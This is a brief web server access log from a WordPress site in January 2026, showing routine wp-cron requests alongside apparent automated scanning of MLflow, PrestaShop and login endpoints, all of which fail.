103.4.122.14 - - [14/Jan/2026:02:34:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768329275.6331748962402343750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:34:32 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:34:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768329285.2253739833831787109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:34:42 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11"
165.232.54.158 - - [14/Jan/2026:02:34:43 +0800] "POST /texteditor.php HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:34:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768329294.3954188823699951171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:34:51 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [14/Jan/2026:02:37:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768329422.8743140697479248046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
159.89.173.22 - - [14/Jan/2026:02:36:59 +0800] "POST /wp-login.php HTTP/1.1" 503 7315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
165.232.54.158 - - [14/Jan/2026:02:39:34 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:39:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768329575.6582720279693603515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:39:32 +0800] "GET /modules/leocustomajax/leocustomajax.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:40:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768329620.7051239013671875000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
